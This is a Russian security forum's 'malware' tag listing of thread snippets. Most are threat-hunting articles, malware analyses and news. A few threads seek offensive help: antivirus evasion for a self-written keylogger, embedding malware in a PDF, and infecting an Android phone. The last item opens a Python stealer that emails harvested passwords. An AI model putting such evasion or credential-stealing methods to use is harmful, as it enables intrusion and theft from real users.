malware

  1. samhainhf

    Статья Threat Hunting на шифровальщиков до того, как они зашифруют всё: Поведенческие индикаторы

    Ты привык думать, что ransomware - это когда бах, и все файлы стали .locked? Поздравляю, ты уже проиграл. К тому моменту, когда пользователь видит горящие глаза на экране и записку с требованием выкупа, шифровальщик уже сделал своё дело. Современные варики способны пережевать 100 тысяч файлов...
  2. samhainhf

    Статья Threat Hunting: Как обнаружить атаки Living-off-the-Land

    Помнишь старые добрые времена, когда антивирус находил вирус по подписи, ты радостно чистил комп и шёл пить чай? Времена, когда хакеры таскали с собой экзешники с именами типа hack.exe и их можно было заблочить одной сигнатурой? Забудь. Эти времена кончились, когда школьники поняли, что проще...
  3. samhainhf

    Статья Rootkit: Скрытая угроза в деталях

    Когда-то, в эпоху динозавров на Windows 98, безопасность была игрой в кошки-мышки: вирус прятался, антивирус искал. Это была война на уровне файлов и процессов. Руткит меняет само поле боя. Он не прячется в системе. Он становится её частью. Его цель - не выполнить зловредную нагрузку, а...
  4. samhainhf

    Статья Методы детектирования C2-трафика, маскирующегося под легитимный

    Привет, друг. Садись ближе к экрану. У меня для тебя плохая новость: та сигнатурная база, за которую твой начальник платит безумные деньги, и тот красивый фаерволл на стойке - они уже проиграли. Не всем, конечно. От какого-нибудь ширпотребового малвари они ещё постараются. Но против тех, кто...
  5. cu63

    Cl0p: разбор несложной малвари для самых маленьких

    Привет^3🦠 Сегодня покажу вам разбор несложной малвари под Linux. Реверс-инжиниринг помогает разобраться в том, как работает ВПО (вредоносное программное обеспечение). Cl0p. Часть 1. Cтатический анализ При анализе малвары мне нравится извелкать интересные приемы, которые в ней используются. А...
  6. NH-NH

    На проверке Создание Вирусов И Язык Программирования Go. Что Скрывает Милый Пушистик?

    С чем у вас ассоциируется язык Golang? Сети, микросервисы, облака и... милый синий суслик. Но за этой маской скрывается мощнейший инструмент, который всё чаще выбирают APT-группировки и разработчики Ransomware. Данная статья ориентирована на новичков, мы разберемся, какие языки программирования...
  7. B

    News Тёмный трюк TikTok: вредоносное ПО Aura Stealer маскируется под руководства по активации продуктов

    В эпоху хрупкого и непостоянного цифрового доверия киберпреступники нашли новый способ эксплуатировать любопытство и удобство. Целая волна видеороликов в TikTok, искусно замаскированных под «руководства по активации продукта», используется для распространения вредоносного ПО Aura Stealer —...
  8. RomanPramskiy

    keylogger по типу Rubber

    Доброго времени суток! Написал кейлоггер по типу Rubber, на c++ from-stratch WinAPI. Написан он был для компании, в целях мониторинга действий сотрудников. Но незнаю как сделать чтоб антивирусы его не детектили(это одно из требований в ТЗ). Знаю что антивирусы детектят вирусы, по принципам...
  9. delifer

    Статья Tsurugi Linux для цифровой криминалистики

    Введение Кратко о дистрибутиве Tsurugi OS Acquire - версия для быстрого анализа дисков. Для углубленного анализа нужна [LAB]-версия. Tsurugi Linux [LAB] — это специализированная версия Tsurugi OS являющаяся сборкой на базе Debian/Ubuntu, оптимизированная для работы в лабораторных условиях. Она...
  10. Codeby News

    News Злоумышленники заражают разработчиков .NET через репозиторий NuGet

    Эксперты компании JFrog сообщили о новых атаках на разработчиков .NET через пакеты из репозитория NuGet. Злоумышленники маскируют свои вредоносные пакеты под реально существующие инструменты, используя технику тайпсквоттинга. Некоторые из этих пакетов были загружены более 150 000 раз за месяц...
  11. Codeby News

    News Вредоносные моды для Dota 2 обнаружены в магазине Steam

    Специалисты из компании Avast Threat Labs выявили четыре вредоносных мода для игры Dota 2, которые размещены в онлайн-магазине игр Steam. "Обнаруженные вредоносные моды размещены под именами Overdog no annoying heroes (id 2776998052), Custom Hero Brawl (id 2780728794) и Overthrow RTZ Edition...
  12. Mark Klintov

    Работа и анализ. Какую малварь разобрать?

    На форуме была замечена достаточно сильная активность в теме реверса. Чтобы не писать об устаревших малварях или очень малоизвестных ратниках предлагаю скинуть название любого вируса для анализа. По нему будет проведена исследовательская работа и выложена статья. Свои варианты предлагайте ниже...
  13. Mark Klintov

    Статья Вирусы под микроскопом: инструменты для анализа малвари

    Введение В последнее время ты слышишь про огромное количество взломов крупных компаний с использованием вредоносного ПО. В инструментарий для атак входят шифровальщики, программы-вымогатели. Поэтому специалистам по информационной безопасности не редко приходится прибегать к множеству утилит для...
  14. dieZel

    Статья Как пишут вредоносные программы на bash

    Всем привет,сегодня мы вновь коснёмся темы вирусов на bash, но в этот раз пройдёмся по теории. В этой статье я планирую обозреть частые приёмы/утилиты/конструкции, используемые при создании вирусов на Bash. Утилиты cron – Вирусы используют cron в качестве менеджера автозапуска, т.к. он по...
  15. HellaHillz

    Как вшить малварь в PDF

    Добрый день, много где искал ответ на этот вопрос - нашёл только модуль msf 2010 года для Adobe, и то он для пейлоадов. Получается никак нельзя вшить?
  16. ROP

    Статья RotaJakiro: Долгоживущий секретный бэкдор с 0 обнаружениями на VirusTotal [ Перевод ]

    🖐 Приветствую всех читателей yg140.servegame.com 🖐 Недавно специалисты Qihoo 360 Netlab обнаружили очень интересный бэкдор, который получил название RotaJakiro. Данный бэкдор имел 0 обнаружений на VirusTotal длительное количество времени. Специалисты Qihoo 360 Netlab написали статью об этом бэкдоре в...
  17. xxxzsx

    Как удалить склейку с вирусом и получить незараженный исполняемый файл?

    Какие инструменты могут помочь разобрать и удалить склейку, чтобы вернуть программу в исходный вид? Вручную через рефлектор/подобное либо автоматом если для этого что-то существует? Ни один из антивирусов, которые хвастаются кнопкой «вылечить файл», не вылечил ничего из того что у меня имеется...
  18. Keil

    Заразить удалённо Android-телефон.

    Доброго времени суток! Возник такой вот вопрос. Как можно заразить малварём телефон на Android? Само устройство- Redmi Note 8 Pro, если это имеет значение. Пытался делать билды в AhMyth, SpyNote 6.4, всё без толку. При попытке установить APK выдаёт ошибку "файл недоступен". В SpyNote билд...
  19. F

    Гостевая статья BEWARE !CHINESE GoLang MALWARE MAKING SERVERS A CRYPTOMINER

    In this article, we will talk about a campaign which is being run by Chinese Cyber criminals and this time they don’t want to watch what we are doing, rat her they want some resou rce s from our system to mine cryptocurrency. Some researchers from Barracuda have researched about a new variant...
  20. G

    Стиллер паролей на python с отправкой на почту

    Стиллер с отправкой паролей на электронную почту. Очень прост в использовании. :) #!/usr/bin/python import smtplib import base64, os, sys, re import sqlite3 import socket import platform import uuid sender = '' reciever = '' password = '' # Dont change this marker = "Morwy" def wifipass()...